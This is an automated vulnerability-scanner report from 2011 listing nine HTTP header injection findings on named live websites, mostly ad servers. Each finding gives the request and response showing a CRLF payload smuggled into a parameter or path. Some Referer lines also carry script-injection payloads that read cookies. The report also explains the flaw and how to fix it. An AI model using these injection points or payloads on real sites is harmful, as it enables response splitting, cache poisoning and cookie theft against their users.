HTTP Header Injection, CWE-113, DORK Search, 2-2-2011 Report

HTTP Header Injection DORKS for 2-2-2011 | Vulnerability Crawler Report

Report generated by CloudScan Vulnerability Crawler at Fri Feb 04 13:39:30 CST 2011.

DORK CWE-79 XSS Report

Loading

1. HTTP header injection

1.1. http://102.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]

1.2. http://102.xg4ken.com/media/redir.php [url[] parameter]

1.3. http://2e76.v.fwmrm.net/ad/l/1 [cr parameter]

1.4. http://ad.br.doubleclick.net/getcamphist [src parameter]

1.5. http://ad.doubleclick.net/ad/N3340.scanscout.com/B4852812.30 [REST URL parameter 1]

1.6. http://ad.doubleclick.net/adi/N3671.TMP/B5159652.23 [REST URL parameter 1]

1.7. http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.4 [REST URL parameter 1]

1.8. http://ad.doubleclick.net/adi/lb.buzzillions/ [REST URL parameter 1]

1.9. http://www.supermedia.com/spportal/spportalFlow.do [REST URL parameter 2]


1. HTTP header injection
There are 9 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

1.1. http://102.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://102.xg4ken.com
Path:   /media/redir.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 939d6%0d%0ad29cc9616d1 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /media/redir.php?prof=88&camp=4679&affcode=cr197235&cid=7085856551|166328|SmartDraw&mType=e&networkType=search&url[]=http%3A%2F%2Finfo.mindjet.com%2FMindManagerB.html%3Fcmpg%3DAmericas_-_Google_US_Competitors/x22&939d6%0d%0ad29cc9616d1=1 HTTP/1.1
Host: 102.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 20:31:21 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=7f1e123c-7cbf-4f88-c29c-00007fc2381d; expires=Wed, 04-May-2011 20:31:21 GMT; path=/; domain=.xg4ken.com
Location: http://info.mindjet.com/MindManagerB.html?cmpg=Americas_-_Google_US_Competitors/x22&939d6
d29cc9616d1=1
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

1.2. http://102.xg4ken.com/media/redir.php [url[] parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://102.xg4ken.com
Path:   /media/redir.php

Issue detail

The value of the url[] request parameter is copied into the Location response header. The payload 15d1e%0d%0ad4b2f64cb5a was submitted in the url[] parameter. This caused a response containing an injected HTTP header.

Request

GET /media/redir.php?prof=88&camp=4679&affcode=cr197235&cid=7085856551|166328|SmartDraw&mType=e&networkType=search&url[]=http%3A%2F%2Finfo.mindjet.com%2FMindManagerB.html%3Fcmpg%3DAmericas_-_Google_US_Competitors/x2215d1e%0d%0ad4b2f64cb5a HTTP/1.1
Host: 102.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 20:31:21 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=5768e8a0-3fce-aa69-4351-00001bc16518; expires=Wed, 04-May-2011 20:31:21 GMT; path=/; domain=.xg4ken.com
Location: http://info.mindjet.com/MindManagerB.html?cmpg=Americas_-_Google_US_Competitors/x2215d1e
d4b2f64cb5a
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

1.3. http://2e76.v.fwmrm.net/ad/l/1 [cr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://2e76.v.fwmrm.net
Path:   /ad/l/1

Issue detail

The value of the cr request parameter is copied into the Location response header. The payload ae913%0d%0a56b335fe342 was submitted in the cr parameter. This caused a response containing an injected HTTP header.

Request

GET /ad/l/1?last=0&ct=0&metr=127&s=c110&t=129676725240202813&adid=249349&reid=123864&arid=0&auid=&cn=defaultImpression&et=i&_cc=249349,123864,10361.,10361.10364.,1296767252,1&tpos=0&iw=&uxnw=11894&uxss=sg11948&uxct=1&init=1&cr=ae913%0d%0a56b335fe342 HTTP/1.1
Host: 2e76.v.fwmrm.net
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _cph="1295039779.438.1.1,"; _auv="g11951~5.1296076541.0,12670.1296075237.880,12671.1296076541.0,^"; _cvr="1296076529^11575^sg11951~sg11611^0~0^2206.000000~0.000000,"; _pr="1296076540.8163.209169~209170~,1296076434.7120.209169~209170~,1296076334.4450.209169~209170~,1296076263.3972.209169~209170~,1296076138.3959.209169~209170~,1296076027.4830.209169~209170~,1296075922.4171.209169~209170~,1296075822.3611.209169~209170~,1296075754.4614.209169~209170~,1296075621.9008.209169~209170~,1296075510.8419.209169~209170~,1296075405.9586.209169~209170~,1296075304.8942.209169~209170~,1296075235.1965.209169~209170~,1296075101.798.209169~209170~,1296074990.1228.209169~209170~,1296074859.104.209169~209170~,1296074758.1162.209169~209170~,1296074642.5926.209169~209170~,1296074515.1669.209169~209170~,1296074405.2652.209169~209170~,1296074299.7276.209169~209170~,1296074199.8486.209169~209170~,1296074130.5588.209169~209170~,1296074005.5439.209169~209170~,1296073893.9848.209169~209170~,1296073785.9641.209169~209170~,1296073682.7603.209169~209170~,1296073611.6354.209169~209170~,1296073486.2138.209169~209170~,1296073374.8594.209169~209170~,1296073267.5235.209169~209170~,1296073166.3153.209169~209170~,1296073098.1567.209169~209170~,1296072968.5610.209169~209170~,"; NSC_okcbewjq1.gxnsn.ofu=ffffffff09091c3945525d5f4f58455e445a4a423209; _sid="c110_5569572937864193463"; _uid="a104_5562153497824379009"; _vr="1296767252.0+7564699552021921.248599~249349~331220~,"; _sc="sg12288.1296767252.1296767253.28800.0.0,"; _wr="g12288"

Response

HTTP/1.1 302 Found
Set-Cookie: _auv="g12288~1.1296769260.0,12720.1296769260.0,^";expires=Sat, 05 Mar 2011 21:41:00 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _cvr="1296769250^11894^sg12288~sg11948^0~0^0.000000~55.000000,";expires=Sat, 05 Mar 2011 21:41:00 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _vr="1296769245.0+7564699552021921.248599~249349~331220~,";expires=Sat, 05 Mar 2011 21:41:00 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _sc="sg12288.1296767252.1296769260.28800.0.0,";expires=Sat, 05 Mar 2011 21:41:00 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _wr="g12288";expires=Sat, 05 Mar 2011 21:41:00 GMT;domain=.fwmrm.net;path=/;
Location: ae913
56b335fe342
Content-Length: 0
Date: Thu, 03 Feb 2011 21:40:59 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"
Set-Cookie: NSC_ozdbewjq3.gxnsn.ofu=ffffffff09091f0b45525d5f4f58455e445a4a423208;path=/;httponly

1.4. http://ad.br.doubleclick.net/getcamphist [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.br.doubleclick.net
Path:   /getcamphist

Issue detail

The value of the src request parameter is copied into the Location response header. The payload 24537%0d%0a2e8dc5adfe9 was submitted in the src parameter. This caused a response containing an injected HTTP header.

Request

GET /getcamphist;src=1513429;host=metrics.apple.com%2Fb%2Fss%2Fappleglobal%2Cappleusipad%2F1%2FH.22.1%2Fs9681528011336%3FAQB%3D1%26vvpr%3Dtrue%26%26ndh%3D1%26t%3D3%252F1%252F2011%252011%253A50%253A27%25204%2520360%26pageName%3Dipad%2520-%2520index%2520%28us%29%26g%3Dhttp%253A%252F%252Fwww.apple.com%252Fipad%252F%26r%3Dhttp%253A%252F%252Fwww.apple.com%252Fitunes%252F%26cc%3DUSD%26vvp%3DDFA%25231513429%253Av46%253D%255B%255B%2522DFA-%2522%252Blis%252B%2522-%2522%252Blip%252B%2522-%2522%252Blastimp%252B%2522-%2522%252Blastimptime%252B%2522-%2522%252Blcs%252B%2522-%2522%252Blcp%252B%2522-%2522%252Blastclk%252B%2522-%2522%252Blastclktime%255D%255D%26ch%3Dwww.us.ipad%26c4%3Dhttp%253A%252F%252Fwww.apple.com%252Fipad%252F%26c5%3Dwin32%26c6%3D%253A%2520ipad%2520-%2520index%2520%28us%29%26c9%3Dwindows%26c14%3Ditunes%2520-%2520index%2520%28us%29%26c15%3Dno%2520zip%26c17%3Dundefined%253Aundefined%26c18%3Dno%2520quicktime%26c19%3Dflash%252010%26c20%3Dnon-store%2520kiosk%26c44%3Dappleusipad%26c48%3D1%26c49%3DD%253Ds_vi%26c50%3Dipad%253D1%26s%3D1920x1200%26c%3D16%26j%3D1.6%26v%3DY%26k%3DY%26bw%3D1037%26bh%3D1012%26p%3DChrome%2520PDF%2520Viewer%253BGoogle%2520Gears%25200.5.33.0%253BShockwave%2520Flash%253BJava%2520Deployment%2520Toolkit%25206.0.230.5%253BJava%28TM%29%2520Platform%2520SE%25206%2520U23%253BWPI%2520Detector%25201.1%253BGoogle%2520Update%253BSilverlight%2520Plug-In%253BDefault%2520Plug-in%253B%26u%3Dappleglobal%2Cappleitunes%2Cappleusitunesipod%26pid%3Ditunes%2520-%2520index%2520%28us%29%26pidt%3D1%26oid%3Dhttp%253A%252F%252Fwww.apple.com%252Fipad%252F%26ot%3DA%26u%3D0%26AQE%3D124537%0d%0a2e8dc5adfe9&A2S=1;ord=2015452841 HTTP/1.1
Host: ad.br.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.apple.com/ipad/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.0 302 Moved Temporarily
Content-Length: 0
Location: http://metrics.apple.com/b/ss/appleglobal,appleusipad/1/H.22.1/s9681528011336?AQB=1&vvpr=true&&ndh=1&t=3%2F1%2F2011%2011%3A50%3A27%204%20360&pageName=ipad%20-%20index%20(us)&g=http%3A%2F%2Fwww.apple.com%2Fipad%2F&r=http%3A%2F%2Fwww.apple.com%2Fitunes%2F&cc=USD&vvp=DFA%231513429%3Av46%3D%5B%5B%22DFA-%22%2Blis%2B%22-%22%2Blip%2B%22-%22%2Blastimp%2B%22-%22%2Blastimptime%2B%22-%22%2Blcs%2B%22-%22%2Blcp%2B%22-%22%2Blastclk%2B%22-%22%2Blastclktime%5D%5D&ch=www.us.ipad&c4=http%3A%2F%2Fwww.apple.com%2Fipad%2F&c5=win32&c6=%3A%20ipad%20-%20index%20(us)&c9=windows&c14=itunes%20-%20index%20(us)&c15=no%20zip&c17=undefined%3Aundefined&c18=no%20quicktime&c19=flash%2010&c20=non-store%20kiosk&c44=appleusipad&c48=1&c49=D%3Ds_vi&c50=ipad%3D1&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1037&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava(TM)%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&u=appleglobal,appleitunes,appleusitunesipod&pid=itunes%20-%20index%20(us)&pidt=1&oid=http%3A%2F%2Fwww.apple.com%2Fipad%2F&ot=A&u=0&AQE=124537
2e8dc5adfe9&A2S=1/respcamphist;src=1513429;ec=nh;rch=2;lastimp=0;lastimptime=0;lis=0;lip=0;lic=0;lir=0;lirv=0;likv=0;lipn=;lastclk=0;lastclktime=0;lcs=0;lcp=0;lcc=0;lcr=0;lcrv=0;lckv=0;lcpn=;ord=1296755474

1.5. http://ad.doubleclick.net/ad/N3340.scanscout.com/B4852812.30 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N3340.scanscout.com/B4852812.30

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 62530%0d%0a230925b8b8 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /62530%0d%0a230925b8b8/N3340.scanscout.com/B4852812.30 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/62530
230925b8b8/N3340.scanscout.com/B4852812.30:
Date: Thu, 03 Feb 2011 22:03:15 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>
1.6. http://ad.doubleclick.net/adi/N3671.TMP/B5159652.23 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3671.TMP/B5159652.23

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 333cd%0d%0a3e381d53e01 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /333cd%0d%0a3e381d53e01/N3671.TMP/B5159652.23;sz=160x600;pc=[TPAS_ID];click=http://ad.trafficmp.com/a/click?_-611797114104433*_3107*laKR_99*KEB_115*tlB_3443735*xpC_3247**14288lsu2vxsy___3533310**0_3805*MXc_114**_-862839443;ord=5929963708858950656? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-28103178_1296770408,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;kw=reviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22;pos=btf;tile=5;sz=160x600;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296769784?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/333cd
3e381d53e01/N3671.TMP/B5159652.23;sz=160x600;pc=[TPAS_ID];click=http: //ad.trafficmp.com/a/click
Date: Fri, 04 Feb 2011 17:55:39 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>
1.7. http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.4 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.158901.DATAXU/B4970757.4

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 87fe3%0d%0a9a9fc1f6091 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /87fe3%0d%0a9a9fc1f6091/N553.158901.DATAXU/B4970757.4;sz=728x90;pc=[TPAS_ID];ord=628759578? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0054251952045395&output=html&h=90&slotname=7506363877&w=728&lmt=1296848235&flash=10.1.103&url=http%3A%2F%2Fwww.exploit-db.com%2Fvbseo-from-xss-to-reverse-php-shell%2F&dt=1296826635258&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=7506363877&correlator=1296826635225&frm=0&adk=774897698&ga_vid=2124507869.1296826622&ga_sid=1296826622&ga_hid=277931053&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1017&bih=953&eid=30143102&fu=0&ifi=2&dtd=29&xpc=2r8iU0N2xu&p=http%3A//www.exploit-db.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/87fe3
9a9fc1f6091/N553.158901.DATAXU/B4970757.4%3Bsz%3D728x90%3Bpc%3D%5BTPAS_ID%5D%3Bord%3D628759578:
Date: Fri, 04 Feb 2011 17:55:39 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>
1.8. http://ad.doubleclick.net/adi/lb.buzzillions/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/lb.buzzillions/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9db3a%0d%0aa4d4062d9d8 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9db3a%0d%0aa4d4062d9d8/lb.buzzillions/;net=lb;u=,lb-5843489_1296770394,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;pos=atf;tile=1;dcopt=ist;sz=728x90;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296770389? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.buzzillions.com/reviews/59ab9%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4e54375ce26/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/9db3a
a4d4062d9d8/lb.buzzillions/%3Bnet%3Dlb%3Bu%3D%2Clb-5843489_1296770394%2C11d765b6a10b1b3%2Cnone%2Can.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1%3B%3Bpos%3Datf%3Btile%3D1%3Bdcopt%3Dist%3Bsz%3D728x90%3Bcontx%3Dnone%3Bdc%3Dw%3Bbtg%3Dan.:
Date: Fri, 04 Feb 2011 01:50:01 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>
1.9. http://www.supermedia.com/spportal/spportalFlow.do [REST URL parameter 2]  previous

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /spportal/spportalFlow.do

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload cdbde%0d%0ad36a9dd2cc was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /spportal/spportalFlow.docdbde%0d%0ad36a9dd2cc?_flowExecutionKey=_c086BB48A-27A9-FE95-CA40-0000B767F5C1_kD178CD9B-A35A-5925-4EF5-B8443B54EAB4 HTTP/1.1
Host: www.supermedia.com
Proxy-Connection: keep-alive
Referer: http://www.supermedia.com/support/contact-us/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296762103|check#true#1296760303; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 302 Moved Temporarily
Server: Unspecified
Date: Thu, 03 Feb 2011 19:19:10 GMT
Location: https://www.supermedia.com/spportal/spportalFlow.docdbde
d36a9dd2cc?_flowExecutionKey=_c086BB48A-27A9-FE95-CA40-0000B767F5C1_kD178CD9B-A35A-5925-4EF5-B8443B54EAB4
Content-Length: 0
Connection: close

Report generated by CloudScan Vulnerability Crawler at Fri Feb 04 13:39:30 CST 2011.